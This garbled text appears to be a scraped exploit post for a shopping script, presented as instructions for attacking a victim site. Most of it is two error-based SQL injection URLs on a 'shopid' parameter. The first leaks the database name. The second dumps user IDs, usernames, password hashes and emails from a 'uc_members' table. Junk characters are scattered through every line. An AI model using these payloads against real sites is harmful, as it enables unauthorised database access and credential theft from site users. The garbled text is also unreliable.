1 W8 p. _. w0 X' t9 U3 I; X! ^__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * b7 Q7 b$ a" I& `) t: g* o V , m" M; T! `' X+ z" D# kYour Need victim Database name. ' h9 h; v- f) K
1 r6 [0 D8 Z: F7 j$ ~& e8 Xfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + L& P, v) w; ?* t% v9 W! z: [
: f' v G5 w @- X/ r.. % I& \( h7 J/ l. F) q' f v
% Y8 i1 m8 K8 i8 o9 A$ E
DB : Okey. 2 l. J! ]* L6 Y6 O8 @) X
) l4 \. g% }* h0 p
your edit DB `[TARGET DB NAME]` 1 C) v4 D$ w' R4 U" S8 Y, F9 O8 X# S7 k: |
Example : 'hiwir1_ucenter' 3 e! r# f& x; O) L! k, K5 h' T/ ], f r1 G2 s. ~' ]
Edit : Okey. + \+ s7 Z y+ P; f" u' r4 d5 d
2 q: v$ `* ^* V
Your use Hex conversion. And edit Your SQL Injection Exploit.. - ^, B: ?8 Q0 J; P. C8 ~3 A J g! Z" V: t: @- Q1 [2 J5 f8 `& Y# U
& |( p+ H* g; ~ 1 v, |# z. L; F9 |+ M* ~ BExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 B0 G" ~6 B3 ~" H8 }% b